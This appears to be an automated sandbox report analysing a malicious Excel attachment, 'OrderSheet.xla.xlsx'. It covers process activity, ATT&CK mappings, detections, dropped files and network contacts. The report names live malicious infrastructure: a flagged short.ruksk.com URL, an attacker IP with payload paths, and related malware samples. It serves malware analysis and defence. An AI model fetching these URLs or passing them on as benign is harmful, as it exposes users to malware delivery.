Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: OrderSheet.xla.xlsxStream path 'MBD00016416/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: OrderSheet.xla.xlsxStream path 'Workbook' entropy: 7.99869339941 (max. 8.0)
Source: FA440000.0.drStream path 'MBD00016416/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: FA440000.0.drStream path 'Workbook' entropy: 7.9867467551 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 525Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572118 Sample: OrderSheet.xla.xlsx Startdate: 10/12/2024 Architecture: WINDOWS Score: 68 29 x1.i.lencr.org 2->29 31 short.ruksk.com 2->31 33 bg.microsoft.map.fastly.net 2->33 39 Antivirus detection for URL or domain 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Excel sheet contains many unusual embedded objects 2->43 45 2 other signatures 2->45 9 EXCEL.EXE 192 93 2->9         started        13 EXCEL.EXE 63 57 2->13         started        signatures3 process4 dnsIp5 35 172.245.123.29, 49820, 80 AS-COLOCROSSINGUS United States 9->35 37 short.ruksk.com 54.150.207.131, 443, 49814 AMAZON-02US United States 9->37 27 C:\Users\user\Desktop\~$OrderSheet.xla.xlsx, data 9->27 dropped 15 Acrobat.exe 64 9->15         started        17 splwow64.exe 1 9->17         started        19 splwow64.exe 9->19         started        21 splwow64.exe 9->21         started        file6 process7 process8 23 AcroCEF.exe 106 15->23         started        process9 25 AcroCEF.exe 4 23->25         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
OrderSheet.xla.xlsx18%ReversingLabs
OrderSheet.xla.xlsx11%VirustotalBrowse
OrderSheet.xla.xlsx100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverage100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mira-tmc.tm-4.office.com
52.123.243.178
truefalse
    		high
    bg.microsoft.map.fastly.net
    		199.232.210.172
    		truefalse
      		high
      s-part-0035.t-0009.t-msedge.net
      		13.107.246.63
      		truefalse
        		high
        short.ruksk.com
        		54.150.207.131
        		truefalse
          		high
          x1.i.lencr.org
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beveragefalse
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              172.245.123.29
              		unknownUnited States
              		36352AS-COLOCROSSINGUSfalse
              54.150.207.131
              		short.ruksk.comUnited States
              		16509AMAZON-02USfalse

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1572118
              Start date and time:2024-12-10 06:46:42 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 5s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Potential for more IOCs and behavior
              Number of analysed new started processes analysed:17
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • GSI enabled (VBA)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:OrderSheet.xla.xlsx
              Detection:MAL
              Classification:mal68.expl.winXLSX@22/73@2/2
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .xlsx
              • Changed system and user locale, location and keyboard layout to French - France
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Active ActiveX Object
              • Active ActiveX Object
              • Active ActiveX Object
              • Scroll down
              • Close Viewer

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.109.28.47, 23.218.208.109, 199.232.210.172, 104.46.162.224, 2.20.60.204, 52.6.155.20, 3.233.129.217, 52.22.41.97, 3.219.243.226, 162.159.61.3, 172.64.41.3, 23.195.39.65, 23.32.238.147, 23.32.238.137, 23.32.238.163, 20.189.173.25, 52.123.243.178, 20.190.181.2, 4.175.87.197, 13.107.246.63, 23.47.168.24
              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, p13n.adobe.io, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.c
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              00:48:40API Interceptor567x Sleep call for process: splwow64.exe modified
              00:48:50API Interceptor1x Sleep call for process: AcroCEF.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              172.245.123.29seemybestdayguvenu.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
              • 172.245.123.29/770/CAMCA.txt
              seemebestthings.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
              • 172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF
              Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
              • 172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF
              54.150.207.131Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                  FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                    Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                      Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                        #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                          0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            short.ruksk.comPotvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                            • 54.150.207.131
                            FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                            • 54.150.207.131
                            Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                            • 54.150.207.131
                            Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                            • 54.150.207.131
                            #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                            • 54.150.207.131
                            0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                            • 54.150.207.131
                            bg.microsoft.map.fastly.netfile.exeGet hashmaliciousStealcBrowse
                            • 199.232.210.172
                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                            • 199.232.214.172
                            file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                            • 199.232.214.172
                            lz3EbiqoK4.exeGet hashmaliciousQuasarBrowse
                            • 199.232.214.172
                            List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                            • 199.232.210.172
                            xMaSQ3Bn10.docxGet hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                            • 199.232.214.172
                            XUTLbT1Wd1.exeGet hashmaliciousUnknownBrowse
                            • 199.232.210.172
                            XUTLbT1Wd1.exeGet hashmaliciousUnknownBrowse
                            • 199.232.210.172
                            Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                            • 199.232.210.172
                            s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.63
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.63
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.63
                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 13.107.246.63
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.63
                            https://sgwarch-my.sharepoint.com/:f:/p/setup1/EiozDTFdgcdOj57XSlxa0wgB_yucGXpVtBz0YeRUUS4djA?e=J1BMm6&xsdata=MDV8MDJ8bG9nYW5AaG9sdHhwLmNvbXw4NzViY2I1MjBhNzQ0NjAxMGYxODA4ZGQxODZlODVlN3w0Y2NhZDYyOTg3ZWM0MmRmOTU3YTYxMmI0OTU2YmE3NXwwfDB8NjM4NjkzNTg1MTc0NTY1ODEyfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=cmt5N3BwOXR0VGIwbDEyNWFnZmRKYVBMMzhQVUJ4bmJpNnppZGtydXJjST0%3dGet hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.63
                            file.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                            • 13.107.246.63
                            https://www.google.com.hk/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fjvsimmigration.com/c/efcfa9e5f8b2f41713ea899643a31954/YnJ1Y2VwQGxlc21hbi5jb20=Get hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 13.107.246.63
                            mira-tmc.tm-4.office.comTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                            • 52.123.243.181
                            List of required items.vbsGet hashmaliciousUnknownBrowse
                            • 52.123.243.179
                            K0Szg26cRh.docGet hashmaliciousUnknownBrowse
                            • 52.123.243.180
                            Note no. ROC 2453-2024.docGet hashmaliciousUnknownBrowse
                            • 52.123.243.181
                            https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2MGet hashmaliciousUnknownBrowse
                            • 52.123.243.183
                            MdDRzxozMD.xlsxGet hashmaliciousUnknownBrowse
                            • 52.123.243.183
                            NEW ORDER #233.xlam.xlsxGet hashmaliciousUnknownBrowse
                            • 52.123.243.178
                            Citation(1).docxGet hashmaliciousUnknownBrowse
                            • 52.123.243.177
                            https://theoggroup-my.sharepoint.com/:u:/g/personal/rohit_theoggroup_co/EW1S6u7eBPZAkl8sn76CFW4B9_fhjfgaN299JnYAgaQ9MQ?e=CXhREy&xsdata=MDV8MDJ8RGVib3JhaC5DbGFya0BtcGZ0Lm5ocy51a3w5NDRiZjU4NDRlNTk0NmZlNWNlNTA4ZGQwZmI5NDMxMnxjMzdkNjM1N2M4OGI0MjZiYjY4MGRmODE2NmE4NmVkN3wwfDB8NjM4Njg0MDEwNTcwNTEwNzIwfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=MHA0b3IvdkFFTytKRVJ3WGJUSzFiaW1jbm16a2hNNURVamQwbGRiNFB6RT0%3dGet hashmaliciousUnknownBrowse
                            • 52.123.243.180
                            https://ymcajeffco-my.sharepoint.com/:u:/g/personal/rcampbell_mtvernonymca_org/Eb_PxgSrk7VCrlppYfmkXowB9vCdCR2cgdVG8AQkH7BcbQ?e=b9efJ2Get hashmaliciousHTMLPhisherBrowse
                            • 52.123.243.182

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            AS-COLOCROSSINGUSNeed Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                            • 104.168.7.16
                            7056ZCiFdE.exeGet hashmaliciousRemcosBrowse
                            • 192.210.150.26
                            uIarPolvHR.exeGet hashmaliciousRemcosBrowse
                            • 192.210.150.26
                            IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                            • 192.210.150.26
                            meerkat.x86.elfGet hashmaliciousMiraiBrowse
                            • 104.168.61.38
                            CGDL.docGet hashmaliciousUnknownBrowse
                            • 192.3.172.208
                            seemejkiss.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                            • 107.175.113.196
                            seemybestdayguvenu.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                            • 172.245.123.29
                            k4PAIh16E6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            • 192.3.118.10
                            AMAZON-02USrebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                            • 18.218.112.132
                            rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                            • 54.99.33.239
                            rebirth.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                            • 54.171.230.55
                            rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                            • 35.155.250.157
                            rebirth.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                            • 13.50.115.226
                            rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                            • 34.242.244.192
                            rebirth.mips.elfGet hashmaliciousMirai, OkiruBrowse
                            • 52.63.66.96
                            https://businessnotice.org/dhl/22450156620/tracking?u=84775-c0bf6be57168918ea5fe039631be6c3a772f4fac11292328fca4a210ba0e8890Get hashmaliciousUnknownBrowse
                            • 52.216.24.6
                            la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                            • 34.208.154.238

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            6271f898ce5be7dd52b0fc260d0662b3Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                            • 54.150.207.131
                            https://www.drvhub.netGet hashmaliciousUnknownBrowse
                            • 54.150.207.131
                            http://74.50.69.234/Get hashmaliciousUnknownBrowse
                            • 54.150.207.131
                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                            • 54.150.207.131
                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                            • 54.150.207.131
                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                            • 54.150.207.131
                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                            • 54.150.207.131
                            Transferencia.lnkGet hashmaliciousXenoRATBrowse
                            • 54.150.207.131
                            Software_Tool.exeGet hashmaliciousUnknownBrowse
                            • 54.150.207.131
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 54.150.207.131

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):118
                            Entropy (8bit):3.5700810731231707
                            Encrypted:false
                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                            MD5:573220372DA4ED487441611079B623CD
                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.124999135769634
                            Encrypted:false
                            SSDEEP:6:7pv99+q2P92nKuAl9OmbnIFUt8O4XJZmw+O4X9VkwO92nKuAl9OmbjLJ:7pWv4HAahFUt8O45/+O4T5LHAaSJ
                            MD5:8790A2DD16458F51DBEB04716E804B44
                            SHA1:40AE833D38A42381DE6119E6AFC26548E71DD892
                            SHA-256:79A487207855B28AA5C9ACE88B29E8C722A5C7A23BA4E344732331D4F91662A6
                            SHA-512:80938D33DA7C8E279ACCC64A7750E095AF6769D9ED864CADE27C80836BCD715DEE309A31A349868BA355F56D6D75C3EC3E142AC83FC7CC3189919D584E25E9A0
                            Malicious:false
                            Preview:2024/12/10-00:48:40.709 1808 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-00:48:40.711 1808 Recovering log #3.2024/12/10-00:48:40.711 1808 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.124999135769634
                            Encrypted:false
                            SSDEEP:6:7pv99+q2P92nKuAl9OmbnIFUt8O4XJZmw+O4X9VkwO92nKuAl9OmbjLJ:7pWv4HAahFUt8O45/+O4T5LHAaSJ
                            MD5:8790A2DD16458F51DBEB04716E804B44
                            SHA1:40AE833D38A42381DE6119E6AFC26548E71DD892
                            SHA-256:79A487207855B28AA5C9ACE88B29E8C722A5C7A23BA4E344732331D4F91662A6
                            SHA-512:80938D33DA7C8E279ACCC64A7750E095AF6769D9ED864CADE27C80836BCD715DEE309A31A349868BA355F56D6D75C3EC3E142AC83FC7CC3189919D584E25E9A0
                            Malicious:false
                            Preview:2024/12/10-00:48:40.709 1808 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-00:48:40.711 1808 Recovering log #3.2024/12/10-00:48:40.711 1808 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):338
                            Entropy (8bit):5.145019763902111
                            Encrypted:false
                            SSDEEP:6:7SVq2P92nKuAl9Ombzo2jMGIFUt8OejZmw+Oe5kwO92nKuAl9Ombzo2jMmLJ:74v4HAa8uFUt8Oo/+Ow5LHAa8RJ
                            MD5:04181994EAEB47676E5E356D059344CD
                            SHA1:26DB4EEB4A89E2A002B1B4876ACA2A085AE6D55C
                            SHA-256:C069EE9C5D6FA069EAB30F61E48F108B85F2180B8C9589034D92E3183BF0F4CF
                            SHA-512:BC86E844A76634EFA8C9E41E7D951EBEEE80684C59337B8ED8AB8CB540E3A528902A2B9284A9630523AEB22B80DB97066F0CB9656F3ED6EA547F801AAB0401F0
                            Malicious:false
                            Preview:2024/12/10-00:48:40.773 1b90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/10-00:48:40.774 1b90 Recovering log #3.2024/12/10-00:48:40.774 1b90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):338
                            Entropy (8bit):5.145019763902111
                            Encrypted:false
                            SSDEEP:6:7SVq2P92nKuAl9Ombzo2jMGIFUt8OejZmw+Oe5kwO92nKuAl9Ombzo2jMmLJ:74v4HAa8uFUt8Oo/+Ow5LHAa8RJ
                            MD5:04181994EAEB47676E5E356D059344CD
                            SHA1:26DB4EEB4A89E2A002B1B4876ACA2A085AE6D55C
                            SHA-256:C069EE9C5D6FA069EAB30F61E48F108B85F2180B8C9589034D92E3183BF0F4CF
                            SHA-512:BC86E844A76634EFA8C9E41E7D951EBEEE80684C59337B8ED8AB8CB540E3A528902A2B9284A9630523AEB22B80DB97066F0CB9656F3ED6EA547F801AAB0401F0
                            Malicious:false
                            Preview:2024/12/10-00:48:40.773 1b90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/10-00:48:40.774 1b90 Recovering log #3.2024/12/10-00:48:40.774 1b90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\090451fe-8776-48c5-b432-bbad5231ac69.tmp

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):508
                            Entropy (8bit):5.047195090775108
                            Encrypted:false
                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                            MD5:70321A46A77A3C2465E2F031754B3E06
                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
